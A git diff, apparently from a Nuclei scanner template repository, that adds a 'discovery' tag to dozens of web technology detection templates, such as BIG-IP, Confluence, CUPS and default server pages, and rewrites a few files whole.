a/http/technologies/beyondtrust-remotesupport-version.yaml b/http/technologies/beyondtrust-remotesupport-version.yaml index 9b1caa9aeb3..4d38da131f3 100644 --- a/http/technologies/beyondtrust-remotesupport-version.yaml +++ b/http/technologies/beyondtrust-remotesupport-version.yaml @@ -17,7 +17,7 @@ info: - title:"Remote Support Portal" - http.favicon.hash:-694003434 - http.html:"BeyondTrust Remote Support" - tags: tech,beyondtrust,version,detect + tags: tech,beyondtrust,version,detect,discovery http: - method: GET diff --git a/http/technologies/bigbluebutton-detect.yaml b/http/technologies/bigbluebutton-detect.yaml index 9058c9d764f..2cf93f51f3e 100644 --- a/http/technologies/bigbluebutton-detect.yaml +++ b/http/technologies/bigbluebutton-detect.yaml @@ -11,7 +11,7 @@ info: vendor: bigbluebutton product: bigbluebutton shodan-query: http.title:"BigBlueButton" - tags: tech,bigbluebutton + tags: tech,bigbluebutton,discovery http: - method: GET diff --git a/http/technologies/bigip-apm-detect.yaml b/http/technologies/bigip-apm-detect.yaml index e814cd28ce4..973da6e3e7c 100644 --- a/http/technologies/bigip-apm-detect.yaml +++ b/http/technologies/bigip-apm-detect.yaml @@ -14,7 +14,7 @@ info: vendor: f5 product: big-ip_access_policy_manager shodan-query: html:"BIG-IP APM" - tags: bigip,tech,f5,detect + tags: bigip,tech,f5,detect,discovery http: - method: GET diff --git a/http/technologies/bigip-config-utility-detect.yaml b/http/technologies/bigip-config-utility-detect.yaml index dd536e0a9ae..b95adcb5ad8 100644 --- a/http/technologies/bigip-config-utility-detect.yaml +++ b/http/technologies/bigip-config-utility-detect.yaml @@ -6,7 +6,7 @@ info: severity: info metadata: max-request: 3 - tags: tech,bigip + tags: tech,bigip,discovery http: - method: GET diff --git a/http/technologies/bigip-detect.yaml b/http/technologies/bigip-detect.yaml index 597d886a2de..1d41565ce77 100644 --- a/http/technologies/bigip-detect.yaml +++ b/http/technologies/bigip-detect.yaml @@ -9,7 +9,7 @@ info: - https://support.f5.com/csp/article/K23254150 metadata: max-request: 2 - tags: bigip,tech,f5 + tags: bigip,tech,f5,discovery http: - method: GET diff --git a/http/technologies/blazor-webassembly-detect.yaml b/http/technologies/blazor-webassembly-detect.yaml index 9bafa75c3d6..d4ddfa593d3 100644 --- a/http/technologies/blazor-webassembly-detect.yaml +++ b/http/technologies/blazor-webassembly-detect.yaml @@ -13,7 +13,7 @@ info: verified: true max-request: 1 shodan-query: html:"blazor.boot.json" - tags: blazor,webassembly,detect + tags: blazor,webassembly,detect,discovery http: - method: GET diff --git a/http/technologies/boa-web-server.yaml b/http/technologies/boa-web-server.yaml index c0a5e6904d4..bcd45cb3c65 100644 --- a/http/technologies/boa-web-server.yaml +++ b/http/technologies/boa-web-server.yaml @@ -19,7 +19,7 @@ info: shodan-query: "Server: Boa/" product: boa vendor: boa - tags: boa,tech + tags: boa,tech,discovery http: - method: GET diff --git a/http/technologies/bugzilla-detect.yaml b/http/technologies/bugzilla-detect.yaml index 6cf70e6ff2c..019a0ef89f2 100644 --- a/http/technologies/bugzilla-detect.yaml +++ b/http/technologies/bugzilla-detect.yaml @@ -16,7 +16,7 @@ info: vendor: mozilla product: bugzilla shodan-query: title:"Bugzilla" - tags: tech,bugzilla,mozilla,detect + tags: tech,bugzilla,mozilla,detect,discovery http: - method: GET diff --git a/http/technologies/burp-api-detect.yaml b/http/technologies/burp-api-detect.yaml index 4b492dbc330..0772e9983e1 100644 --- a/http/technologies/burp-api-detect.yaml +++ b/http/technologies/burp-api-detect.yaml @@ -8,7 +8,7 @@ info: - https://portswigger.net/burp/documentation/enterprise/api-reference metadata: max-request: 1 - tags: burp,tech + tags: burp,tech,discovery http: - method: GET diff --git a/http/technologies/burp-collaborator-detect.yaml b/http/technologies/burp-collaborator-detect.yaml index 06114291388..f3b97130d2b 100644 --- a/http/technologies/burp-collaborator-detect.yaml +++ b/http/technologies/burp-collaborator-detect.yaml @@ -19,7 +19,7 @@ info: shodan-query: "Server: Burp Collaborator" product: burp_suite vendor: portswigger - tags: burp,tech,detect + tags: burp,tech,detect,discovery http: - method: GET diff --git a/http/technologies/caobox-cms-detect.yaml b/http/technologies/caobox-cms-detect.yaml index f5d711081d0..02441b073f4 100644 --- a/http/technologies/caobox-cms-detect.yaml +++ b/http/technologies/caobox-cms-detect.yaml @@ -1,44 +1,44 @@ -id: caobox-cms-detect - -info: - name: Caobox CMS - Detect - author: Chirag Mistry - severity: info - description: | - Detects instances of Caobox CMS based on unique fingerprints and identifiers. - metadata: - verified: true - shodan-query: - - http.component:"Caobox" - - http.component:"caobox" - - cpe:"cpe:2.3:a:caobox:caobox" - tags: detect,caobox,cms,tech - -http: - - method: GET - path: - - "{{BaseURL}}" - - payloads: - paths: - - "/" - - "/admin/" - - "/index.php" - - "/admin/login.php" - - matchers-condition: or - matchers: - - type: word - words: - - "Caobox CMS" - - "powered by Caobox" - - "Welcome to Caobox" - - "Caobox version" - condition: or - - - type: regex - regex: - - "(?i)caobox" - - "(?i)caobox\\s+(v[0-9.]+)" +id: caobox-cms-detect + +info: + name: Caobox CMS - Detect + author: Chirag Mistry + severity: info + description: | + Detects instances of Caobox CMS based on unique fingerprints and identifiers. + metadata: + verified: true + shodan-query: + - http.component:"Caobox" + - http.component:"caobox" + - cpe:"cpe:2.3:a:caobox:caobox" + tags: detect,caobox,cms,tech,discovery + +http: + - method: GET + path: + - "{{BaseURL}}" + + payloads: + paths: + - "/" + - "/admin/" + - "/index.php" + - "/admin/login.php" + + matchers-condition: or + matchers: + - type: word + words: + - "Caobox CMS" + - "powered by Caobox" + - "Welcome to Caobox" + - "Caobox version" + condition: or + + - type: regex + regex: + - "(?i)caobox" + - "(?i)caobox\\s+(v[0-9.]+)" - "(?i)Caobox CMS" # digest: 4a0a00473045022100fb2370c77f3ee164dd2d65d39cd0f92d3270d7043974ecf0e8447d47f14f6346022050be288bca6757648d999388e2c6973c7ee6b219eb58927d586b548f63736abd:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/carestream-vue-detect.yaml b/http/technologies/carestream-vue-detect.yaml index 323e8ece55e..7bc5d1a402e 100644 --- a/http/technologies/carestream-vue-detect.yaml +++ b/http/technologies/carestream-vue-detect.yaml @@ -9,7 +9,7 @@ info: - https://www.carestream.com/en/us/-/media/publicsite/resources/radiography-and-health-it/product-brochures/ris-pacs/pdfs/brochure-vue-motion-201601.pdf metadata: max-request: 2 - tags: tech,myvuehelp + tags: tech,myvuehelp,discovery http: - method: GET diff --git a/http/technologies/casaos-detection.yaml b/http/technologies/casaos-detection.yaml index 20a230029cd..91bcda2888a 100644 --- a/http/technologies/casaos-detection.yaml +++ b/http/technologies/casaos-detection.yaml @@ -14,7 +14,7 @@ info: product: casaos shodan-query: http.html:"/CasaOS-UI/public/index.html" fofa-query: body="/CasaOS-UI/public/index.html" - tags: casaos,tech,oss + tags: casaos,tech,oss,discovery http: - method: GET diff --git a/http/technologies/catalog-creator-detect.yaml b/http/technologies/catalog-creator-detect.yaml index 885ad228d14..13ceacf2d71 100644 --- a/http/technologies/catalog-creator-detect.yaml +++ b/http/technologies/catalog-creator-detect.yaml @@ -13,7 +13,7 @@ info: verified: true max-request: 2 shodan-query: http.html:"powered by CATALOGcreator" - tags: tech,catalogcreater,panel + tags: tech,catalogcreater,panel,discovery http: - method: GET diff --git a/http/technologies/celebrus-detect.yaml b/http/technologies/celebrus-detect.yaml index cc29088b10d..fc47f2b3399 100644 --- a/http/technologies/celebrus-detect.yaml +++ b/http/technologies/celebrus-detect.yaml @@ -1,5 +1,5 @@ -id: celebrus-detect - +id: celebrus-detect + info: name: Celebrus - Detect author: righettod @@ -12,27 +12,27 @@ info: verified: true max-request: 1 shodan-query: http.title:"Celebrus" - tags: tech,celebrus,detect + tags: tech,celebrus,detect,discovery -http: - - method: GET - path: - - "{{BaseURL}}" - - host-redirects: true - max-redirects: 2 - - matchers: - - type: dsl - dsl: - - 'status_code == 200' - - 'contains_any(to_lower(body), "content=\"celebrus technologies ltd", "<title>celebrus")' - condition: and - - extractors: - - type: regex - part: body - group: 1 - regex: +http: + - method: GET + path: + - "{{BaseURL}}" + + host-redirects: true + max-redirects: 2 + + matchers: + - type: dsl + dsl: + - 'status_code == 200' + - 'contains_any(to_lower(body), "content=\"celebrus technologies ltd", "<title>celebrus")' + condition: and + + extractors: + - type: regex + part: body + group: 1 + regex: - 'Celebrus\s+([0-9.]+)\s+Collection' # digest: 4a0a00473045022100de0ec3b5e3f4b30a53d646a19535f174e0d76f8d70d0b82dbe6d3b24168b2f5a0220173e53c32c562c1810fb329fcdc60ab4fe1b0603ef1cda3e041e31b3858cf621:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/checkpoint-mobile-detect.yaml b/http/technologies/checkpoint-mobile-detect.yaml index 4bf3248b540..a56a03e6482 100644 --- a/http/technologies/checkpoint-mobile-detect.yaml +++ b/http/technologies/checkpoint-mobile-detect.yaml @@ -16,7 +16,7 @@ info: vendor: checkpoint product: mobile_access_portal_agent shodan-query: http.html:"Check Point Mobile" - tags: panel,checkpoint,detect + tags: panel,checkpoint,detect,discovery http: - method: GET diff --git a/http/technologies/chevereto-detect.yaml b/http/technologies/chevereto-detect.yaml index 8ec058678e8..b1f4cd204f3 100644 --- a/http/technologies/chevereto-detect.yaml +++ b/http/technologies/chevereto-detect.yaml @@ -11,7 +11,7 @@ info: vendor: chevereto product: chevereto shodan-query: http.title:"Centreon" - tags: tech,chevereto + tags: tech,chevereto,discovery http: - method: GET diff --git a/http/technologies/cisco-asa-detect.yaml b/http/technologies/cisco-asa-detect.yaml index 347c615cdeb..bdd765f6c32 100644 --- a/http/technologies/cisco-asa-detect.yaml +++ b/http/technologies/cisco-asa-detect.yaml @@ -6,7 +6,7 @@ info: severity: info metadata: max-request: 1 - tags: tech,cisco,detect + tags: tech,cisco,detect,discovery http: - raw: diff --git a/http/technologies/citrix-hypervisor-page.yaml b/http/technologies/citrix-hypervisor-page.yaml index 79583524ca0..2cfe4754e3d 100644 --- a/http/technologies/citrix-hypervisor-page.yaml +++ b/http/technologies/citrix-hypervisor-page.yaml @@ -12,7 +12,7 @@ info: vendor: citrix product: hypervisor shodan-query: http.title:"Welcome to Citrix Hypervisor" - tags: tech,citrix,default-page + tags: tech,citrix,default-page,discovery http: - method: GET diff --git a/http/technologies/citrix-xenmobile-version.yaml b/http/technologies/citrix-xenmobile-version.yaml index 4e97055908e..5b96a3ec37d 100644 --- a/http/technologies/citrix-xenmobile-version.yaml +++ b/http/technologies/citrix-xenmobile-version.yaml @@ -14,7 +14,7 @@ info: vendor: citrix product: xenmobile_server shodan-query: "title:\"XenMobile - Console\"" - tags: tech,edb,citrix,version,detect + tags: tech,edb,citrix,version,detect,discovery flow: http(1) && http(2) http: diff --git a/http/technologies/cleo-detect.yaml b/http/technologies/cleo-detect.yaml index af81f180276..fbe42323bb0 100644 --- a/http/technologies/cleo-detect.yaml +++ b/http/technologies/cleo-detect.yaml @@ -1,41 +1,41 @@ -id: cleo-detect - -info: - name: Cleo Technology - Detect - author: rxerium - severity: info - description: | - This template detects Cleo technologies, including VLTrader, Harmony, and LexiCom, by inspecting response headers.It also extracts version information for each identified technology. - reference: - - https://www.cleo.com - metadata: - max-request: 1 - verified: true - shodan-query: 'Server: Cleo' - tags: tech,detect,cleo - -http: - - method: GET - path: - - '{{BaseURL}}' - - host-redirects: true - max-redirects: 2 - - matchers: - - type: word - part: server - words: - - "Cleo VLTrader" - - "Cleo Harmony" - - "Cleo LexiCom" - condition: or - - extractors: - - type: regex - part: server - regex: - - "Cleo VLTrader/([0-9.]+)" - - "Cleo Harmony/([0-9.]+)" +id: cleo-detect + +info: + name: Cleo Technology - Detect + author: rxerium + severity: info + description: | + This template detects Cleo technologies, including VLTrader, Harmony, and LexiCom, by inspecting response headers.It also extracts version information for each identified technology. + reference: + - https://www.cleo.com + metadata: + max-request: 1 + verified: true + shodan-query: 'Server: Cleo' + tags: tech,detect,cleo,discovery + +http: + - method: GET + path: + - '{{BaseURL}}' + + host-redirects: true + max-redirects: 2 + + matchers: + - type: word + part: server + words: + - "Cleo VLTrader" + - "Cleo Harmony" + - "Cleo LexiCom" + condition: or + + extractors: + - type: regex + part: server + regex: + - "Cleo VLTrader/([0-9.]+)" + - "Cleo Harmony/([0-9.]+)" - "Cleo LexiCom/([0-9.]+)" # digest: 4a0a00473045022005e05cc3af3abb0faae013e34f9055f51d3b3a33397e9ac106b67b381600268d022100b650987b43e29dd909c699513b1ca0ea602ad94b77aabfa210f39c764b20201b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/cloudflare-nginx-detect.yaml b/http/technologies/cloudflare-nginx-detect.yaml index 999fc54569b..2aa57da14d6 100644 --- a/http/technologies/cloudflare-nginx-detect.yaml +++ b/http/technologies/cloudflare-nginx-detect.yaml @@ -10,7 +10,7 @@ info: verified: true max-request: 1 shodan-query: product:"cloudflare-nginx" - tags: cloudflare,nginx,tech + tags: cloudflare,nginx,tech,discovery http: - method: GET diff --git a/http/technologies/cloudfoundry-detect.yaml b/http/technologies/cloudfoundry-detect.yaml index fafbcce61d4..e5d90e4c03c 100644 --- a/http/technologies/cloudfoundry-detect.yaml +++ b/http/technologies/cloudfoundry-detect.yaml @@ -8,7 +8,7 @@ info: reference: https://docs.cloudfoundry.org/concepts/cf-routing-architecture.html metadata: max-request: 2 - tags: cloudfoundry,tech + tags: cloudfoundry,tech,discovery http: - raw: diff --git a/http/technologies/cobbler-version.yaml b/http/technologies/cobbler-version.yaml index a14811b4553..53dc0f1c4b5 100644 --- a/http/technologies/cobbler-version.yaml +++ b/http/technologies/cobbler-version.yaml @@ -7,7 +7,7 @@ info: description: Obtain cobbler version information metadata: max-request: 1 - tags: tech,cobbler,api + tags: tech,cobbler,api,discovery http: - method: POST diff --git a/http/technologies/cockpit-detect.yaml b/http/technologies/cockpit-detect.yaml index 0e861c14bc4..f48967850bb 100644 --- a/http/technologies/cockpit-detect.yaml +++ b/http/technologies/cockpit-detect.yaml @@ -6,7 +6,7 @@ info: severity: info metadata: max-request: 1 - tags: tech,cockpit + tags: tech,cockpit,discovery http: - method: GET diff --git a/http/technologies/coming-soon-page-detect.yaml b/http/technologies/coming-soon-page-detect.yaml index 8391731cc98..ca09292c96d 100644 --- a/http/technologies/coming-soon-page-detect.yaml +++ b/http/technologies/coming-soon-page-detect.yaml @@ -8,7 +8,7 @@ info: verified: true max-request: 1 shodan-query: title:"Coming Soon" - tags: tech,default-page + tags: tech,default-page,discovery http: - method: GET diff --git a/http/technologies/confluence-detect.yaml b/http/technologies/confluence-detect.yaml index 36d65962129..7b7708a77ba 100644 --- a/http/technologies/confluence-detect.yaml +++ b/http/technologies/confluence-detect.yaml @@ -16,7 +16,7 @@ info: - http.component:"Atlassian Confluence" - http.component:"atlassian confluence" category: productivity - tags: tech,confluence,atlassian,detect + tags: tech,confluence,atlassian,detect,discovery http: - method: GET diff --git a/http/technologies/connectwise-control-detect.yaml b/http/technologies/connectwise-control-detect.yaml index dda68092e21..69a9f30905f 100644 --- a/http/technologies/connectwise-control-detect.yaml +++ b/http/technologies/connectwise-control-detect.yaml @@ -12,7 +12,7 @@ info: vendor: connectwise product: control shodan-query: title="ConnectWise Control Remote Support Software" - tags: tech,connectwise + tags: tech,connectwise,discovery http: - method: GET diff --git a/http/technologies/couchbase-sync-gateway.yaml b/http/technologies/couchbase-sync-gateway.yaml index 1aedc4f79fc..34e7b3c36b7 100644 --- a/http/technologies/couchbase-sync-gateway.yaml +++ b/http/technologies/couchbase-sync-gateway.yaml @@ -11,7 +11,7 @@ info: vendor: couchbase product: sync_gateway shodan-query: html:"Couchbase Sync Gateway" - tags: tech,couchbase + tags: tech,couchbase,discovery http: - method: GET diff --git a/http/technologies/couchdb-detect.yaml b/http/technologies/couchdb-detect.yaml index e2a88cc281c..f4a3e9ff28f 100644 --- a/http/technologies/couchdb-detect.yaml +++ b/http/technologies/couchdb-detect.yaml @@ -9,7 +9,7 @@ info: verified: true max-request: 1 shodan-query: html:""couchdb":" - tags: couchdb,tech,detect,db + tags: couchdb,tech,detect,db,discovery http: - method: GET diff --git a/http/technologies/cowboy-detect.yaml b/http/technologies/cowboy-detect.yaml index ff2bdaab463..5379dfd6888 100644 --- a/http/technologies/cowboy-detect.yaml +++ b/http/technologies/cowboy-detect.yaml @@ -11,7 +11,7 @@ info: verified: true max-request: 1 shodan-query: "cowboy" - tags: tech,cowboy,detect + tags: tech,cowboy,detect,discovery http: - method: GET diff --git a/http/technologies/craft-cms-detect.yaml b/http/technologies/craft-cms-detect.yaml index ae326752289..975b6895b58 100644 --- a/http/technologies/craft-cms-detect.yaml +++ b/http/technologies/craft-cms-detect.yaml @@ -9,7 +9,7 @@ info: - https://craftcms.com metadata: max-request: 1 - tags: tech,craftcms + tags: tech,craftcms,discovery http: - method: GET diff --git a/http/technologies/craftercms-detect.yaml b/http/technologies/craftercms-detect.yaml index d1b15c49890..cd523fa99c3 100644 --- a/http/technologies/craftercms-detect.yaml +++ b/http/technologies/craftercms-detect.yaml @@ -16,7 +16,7 @@ info: vendor: craftercms product: crafter_cms shodan-query: http.title:"craftercms" - tags: tech,craftercms,detect + tags: tech,craftercms,detect,discovery http: - method: GET diff --git a/http/technologies/cryptshare-detect.yaml b/http/technologies/cryptshare-detect.yaml index a4dc727ef2f..269d125594d 100644 --- a/http/technologies/cryptshare-detect.yaml +++ b/http/technologies/cryptshare-detect.yaml @@ -21,7 +21,7 @@ info: product: cryptshare reference: - https://www.pointsharp.com/en/products/cryptshare - tags: detect,tech,cryptshare + tags: detect,tech,cryptshare,discovery http: - method: GET diff --git a/http/technologies/csrfguard-detect.yaml b/http/technologies/csrfguard-detect.yaml index 5a8ad625f17..37523fed1d9 100644 --- a/http/technologies/csrfguard-detect.yaml +++ b/http/technologies/csrfguard-detect.yaml @@ -13,7 +13,7 @@ info: cwe-id: CWE-200 metadata: max-request: 3 - tags: tech,csrfguard,owasp + tags: tech,csrfguard,owasp,discovery http: - raw: diff --git a/http/technologies/cups-detect.yaml b/http/technologies/cups-detect.yaml index 481c5bc2c83..5a9a83c1762 100644 --- a/http/technologies/cups-detect.yaml +++ b/http/technologies/cups-detect.yaml @@ -1,43 +1,43 @@ -id: cups-detect - -info: - name: CUPS - Detect - author: rxerium - severity: info - description: | - An instance running CUPS was detected. - metadata: - verified: true - max-request: 1 - shodan-query: product:"CUPS (IPP)" - tags: cups,tech,detect - -http: - - method: GET - path: - - "{{BaseURL}}" - - matchers-condition: and - matchers: - - type: word - part: body - words: - - "Web Interface is Disabled - CUPS" - - "Forbidden - CUPS" - - "Server: CUPS" - condition: or - - - type: status - status: - - 200 - - 404 - - 403 - condition: or - - extractors: - - type: regex - part: body - name: version - regex: +id: cups-detect + +info: + name: CUPS - Detect + author: rxerium + severity: info + description: | + An instance running CUPS was detected. + metadata: + verified: true + max-request: 1 + shodan-query: product:"CUPS (IPP)" + tags: cups,tech,detect,discovery + +http: + - method: GET + path: + - "{{BaseURL}}" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "Web Interface is Disabled - CUPS" + - "Forbidden - CUPS" + - "Server: CUPS" + condition: or + + - type: status + status: + - 200 + - 404 + - 403 + condition: or + + extractors: + - type: regex + part: body + name: version + regex: - 'CUPS v([0-9.]+)>' # digest: 4a0a00473045022100dcefb75429e9600c20a427c9a9c4dd80b8cde95eb8923021ea2a813559c85c1102200db3976f62f89c78db94ca673b2c80dcbdbc45b10afbbae7b888cd423a346dd2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/cvsweb-detect.yaml b/http/technologies/cvsweb-detect.yaml index 4e4ac2537e5..80ce360d146 100644 --- a/http/technologies/cvsweb-detect.yaml +++ b/http/technologies/cvsweb-detect.yaml @@ -18,7 +18,7 @@ info: shodan-query: title:"cvsweb" fofa-query: title="cvsweb" zoomeye-query: title="cvsweb" - tags: tech,cvsweb,detect + tags: tech,cvsweb,detect,discovery http: - method: GET diff --git a/http/technologies/dash-panel-detect.yaml b/http/technologies/dash-panel-detect.yaml index 24ff68f2537..847bace4e96 100644 --- a/http/technologies/dash-panel-detect.yaml +++ b/http/technologies/dash-panel-detect.yaml @@ -12,7 +12,7 @@ info: vendor: dash product: dash_core shodan-query: html:"DashRenderer" - tags: tech,dash + tags: tech,dash,discovery http: - method: GET diff --git a/http/technologies/dedecms-detect.yaml b/http/technologies/dedecms-detect.yaml index ab3762ff8b4..36c05bc2198 100644 --- a/http/technologies/dedecms-detect.yaml +++ b/http/technologies/dedecms-detect.yaml @@ -12,7 +12,7 @@ info: vendor: dedecms product: dedecms shodan-query: title:"dedecms" || http.html:"power by dedecms" - tags: dedecms,tech + tags: dedecms,tech,discovery http: - method: GET diff --git a/http/technologies/default-amazon-cognito.yaml b/http/technologies/default-amazon-cognito.yaml index 9264c1ce91d..2c4b206946e 100644 --- a/http/technologies/default-amazon-cognito.yaml +++ b/http/technologies/default-amazon-cognito.yaml @@ -10,7 +10,7 @@ info: verified: true max-request: 1 shodan-query: http.title:"Amazon Cognito Developer Authentication Sample" - tags: aws,cognito,default,tech + tags: aws,cognito,default,tech,discovery http: - method: GET diff --git a/http/technologies/default-apache-miracle.yaml b/http/technologies/default-apache-miracle.yaml index 8c2406a391d..59ecda6446a 100644 --- a/http/technologies/default-apache-miracle.yaml +++ b/http/technologies/default-apache-miracle.yaml @@ -8,7 +8,7 @@ info: verified: true max-request: 1 shodan-query: title:"Apache Miracle Linux Web Server" - tags: tech,default-page,apache,miracle + tags: tech,default-page,apache,miracle,discovery http: - method: GET diff --git a/http/technologies/default-apache-shiro.yaml b/http/technologies/default-apache-shiro.yaml index de1bed87570..3706d13142e 100644 --- a/http/technologies/default-apache-shiro.yaml +++ b/http/technologies/default-apache-shiro.yaml @@ -12,7 +12,7 @@ info: vendor: apache product: shiro shodan-query: title:"Apache Shiro Quickstart" - tags: tech,apache,shiro + tags: tech,apache,shiro,discovery http: - method: GET diff --git a/http/technologies/default-asp-net-page.yaml b/http/technologies/default-asp-net-page.yaml index 3cb47d08d00..a120c349551 100644 --- a/http/technologies/default-asp-net-page.yaml +++ b/http/technologies/default-asp-net-page.yaml @@ -7,7 +7,7 @@ info: metadata: max-request: 1 shodan-query: http.title:"Home Page - My ASP.NET Application" - tags: tech,asp + tags: tech,asp,discovery http: - method: GET diff --git a/http/technologies/default-cakephp-page.yaml b/http/technologies/default-cakephp-page.yaml index 63e10126c92..d1bab5fc821 100644 --- a/http/technologies/default-cakephp-page.yaml +++ b/http/technologies/default-cakephp-page.yaml @@ -12,7 +12,7 @@ info: vendor: cakephp product: cakephp shodan-query: html:"Welcome to CakePHP" - tags: tech,cakephp,default-page + tags: tech,cakephp,default-page,discovery http: - method: GET diff --git a/http/technologies/default-centos-test-page.yaml b/http/technologies/default-centos-test-page.yaml index 7bc6f1f2cc3..3c3037adf51 100644 --- a/http/technologies/default-centos-test-page.yaml +++ b/http/technologies/default-centos-test-page.yaml @@ -7,7 +7,7 @@ info: metadata: max-request: 1 shodan-query: http.title:"HTTP Server Test Page powered by CentOS-WebPanel.com" - tags: tech,centos + tags: tech,centos,discovery http: - method: GET diff --git a/http/technologies/default-codeigniter-page.yaml b/http/technologies/default-codeigniter-page.yaml index 5981e8d9410..2e076a16523 100644 --- a/http/technologies/default-codeigniter-page.yaml +++ b/http/technologies/default-codeigniter-page.yaml @@ -11,7 +11,7 @@ info: vendor: codeigniter product: codeigniter shodan-query: http.title:"Welcome to CodeIgniter" - tags: tech,codeigniter + tags: tech,codeigniter,discovery http: - method: GET diff --git a/http/technologies/default-detect-generic.yaml b/http/technologies/default-detect-generic.yaml index d247c37fbd7..652de398167 100644 --- a/http/technologies/default-detect-generic.yaml +++ b/http/technologies/default-detect-generic.yaml @@ -7,7 +7,7 @@ info: description: Catch-all for detecting default installations of web applications using common phrases found in default install pages metadata: max-request: 1 - tags: tech + tags: tech,discovery http: - method: GET diff --git a/http/technologies/default-django-page.yaml b/http/technologies/default-django-page.yaml index 77e954cf6d3..85ddc495f88 100644 --- a/http/technologies/default-django-page.yaml +++ b/http/technologies/default-django-page.yaml @@ -11,7 +11,7 @@ info: vendor: djangoproject product: django shodan-query: http.title:"The install worked successfully! Congratulations!" - tags: tech,django + tags: tech,django,discovery http: - method: GET diff --git a/http/technologies/default-fastcgi-page.yaml b/http/technologies/default-fastcgi-page.yaml index 174e2818d02..a0b415bc129 100644 --- a/http/technologies/default-fastcgi-page.yaml +++ b/http/technologies/default-fastcgi-page.yaml @@ -11,7 +11,7 @@ info: vendor: fastcgi product: fcgi shodan-query: http.title:"FastCGI" - tags: tech,fastcgi + tags: tech,fastcgi,discovery http: - method: GET diff --git a/http/technologies/default-fedora-page.yaml b/http/technologies/default-fedora-page.yaml index 2f3f61cb883..f4307f7ca90 100644 --- a/http/technologies/default-fedora-page.yaml +++ b/http/technologies/default-fedora-page.yaml @@ -11,7 +11,7 @@ info: vendor: fedoraproject product: fedora shodan-query: http.title:"Test Page for the HTTP Server on Fedora" - tags: tech,fedora + tags: tech,fedora,discovery http: - method: GET diff --git a/http/technologies/default-glassfish-server-page.yaml b/http/technologies/default-glassfish-server-page.yaml index 27ac2762c4b..f81f47f4e92 100644 --- a/http/technologies/default-glassfish-server-page.yaml +++ b/http/technologies/default-glassfish-server-page.yaml @@ -11,7 +11,7 @@ info: vendor: oracle product: glassfish_server shodan-query: http.title:"GlassFish Server - Server Running" - tags: tech,glassfish + tags: tech,glassfish,discovery http: - method: GET diff --git a/http/technologies/default-jetty-page.yaml b/http/technologies/default-jetty-page.yaml index 03172a24f9c..3d4b58b4075 100644 --- a/http/technologies/default-jetty-page.yaml +++ b/http/technologies/default-jetty-page.yaml @@ -11,7 +11,7 @@ info: vendor: eclipse product: jetty shodan-query: http.title:"Powered By Jetty" - tags: tech,jetty + tags: tech,jetty,discovery http: - method: GET diff --git a/http/technologies/default-lighttpd-page.yaml b/http/technologies/default-lighttpd-page.yaml index 433ad223ca8..8ac41c7cc46 100644 --- a/http/technologies/default-lighttpd-page.yaml +++ b/http/technologies/default-lighttpd-page.yaml @@ -11,7 +11,7 @@ info: vendor: lighttpd product: lighttpd shodan-query: http.title:"Powered by lighttpd" - tags: tech,lighttpd + tags: tech,lighttpd,discovery http: - method: GET diff --git a/http/technologies/default-lighttpd-placeholder-page.yaml b/http/technologies/default-lighttpd-placeholder-page.yaml index ee38facd3f2..69878bd66fc 100644 --- a/http/technologies/default-lighttpd-placeholder-page.yaml +++ b/http/technologies/default-lighttpd-placeholder-page.yaml @@ -11,7 +11,7 @@ info: vendor: lighttpd product: lighttpd shodan-query: "If you find a bug in this Lighttpd package, or in Lighttpd itself" - tags: tech,lighttpd + tags: tech,lighttpd,discovery http: - method: GET diff --git a/http/technologies/default-lucee-page.yaml b/http/technologies/default-lucee-page.yaml index 34b9b0f9aa9..59df2cfd07e 100644 --- a/http/technologies/default-lucee-page.yaml +++ b/http/technologies/default-lucee-page.yaml @@ -7,7 +7,7 @@ info: metadata: max-request: 1 shodan-query: http.title:"Lucee" - tags: tech,lucee + tags: tech,lucee,discovery http: - method: GET diff --git a/http/technologies/default-movable-page.yaml b/http/technologies/default-movable-page.yaml index e2bb565c32c..057b64e90d3 100644 --- a/http/technologies/default-movable-page.yaml +++ b/http/technologies/default-movable-page.yaml @@ -11,7 +11,7 @@ info: shodan-query: title:"Welcome to Movable Type" product: movable_type vendor: sixapart - tags: tech,movable + tags: tech,movable,discovery http: - method: GET diff --git a/http/technologies/default-openresty.yaml b/http/technologies/default-openresty.yaml index d43608cb856..977bf63d733 100644 --- a/http/technologies/default-openresty.yaml +++ b/http/technologies/default-openresty.yaml @@ -11,7 +11,7 @@ info: vendor: openresty product: openresty shodan-query: http.title:"Welcome to OpenResty!" - tags: tech,openresty + tags: tech,openresty,discovery http: - method: GET diff --git a/http/technologies/default-page-azure-container.yaml b/http/technologies/default-page-azure-container.yaml index 67fed8b025a..ef176bd04fe 100644 --- a/http/technologies/default-page-azure-container.yaml +++ b/http/technologies/default-page-azure-container.yaml @@ -8,7 +8,7 @@ info: verified: true max-request: 1 shodan-query: title:"Welcome to Azure Container Instances!" - tags: tech,azure,cloud + tags: tech,azure,cloud,discovery http: - method: GET diff --git a/http/technologies/default-parallels-plesk.yaml b/http/technologies/default-parallels-plesk.yaml index 1655af25016..4b88aaf8ede 100644 --- a/http/technologies/default-parallels-plesk.yaml +++ b/http/technologies/default-parallels-plesk.yaml @@ -12,7 +12,7 @@ info: vendor: parallels product: parallels_plesk_panel shodan-query: title:"Default Parallels Plesk Panel Page" - tags: tech,default-page,parallels,plesk + tags: tech,default-page,parallels,plesk,discovery http: - method: GET diff --git a/http/technologies/default-payara-server-page.yaml b/http/technologies/default-payara-server-page.yaml index 69f6f3bad57..ba096f3e766 100644 --- a/http/technologies/default-payara-server-page.yaml +++ b/http/technologies/default-payara-server-page.yaml @@ -11,7 +11,7 @@ info: vendor: payara product: payara shodan-query: http.title:"Payara Server - Server Running" - tags: tech,payara + tags: tech,payara,discovery http: - method: GET diff --git a/http/technologies/default-plesk-page.yaml b/http/technologies/default-plesk-page.yaml index d085034f3f4..077384af321 100644 --- a/http/technologies/default-plesk-page.yaml +++ b/http/technologies/default-plesk-page.yaml @@ -11,7 +11,7 @@ info: vendor: plesk product: plesk shodan-query: http.title:"Web Server's Default Page" - tags: tech,plesk + tags: tech,plesk,discovery http: - method: GET diff --git a/http/technologies/default-redhat-test-page.yaml b/http/technologies/default-redhat-test-page.yaml index 18d53012716..156ef66be0f 100644 --- a/http/technologies/default-redhat-test-page.yaml +++ b/http/technologies/default-redhat-test-page.yaml @@ -11,7 +11,7 @@ info: 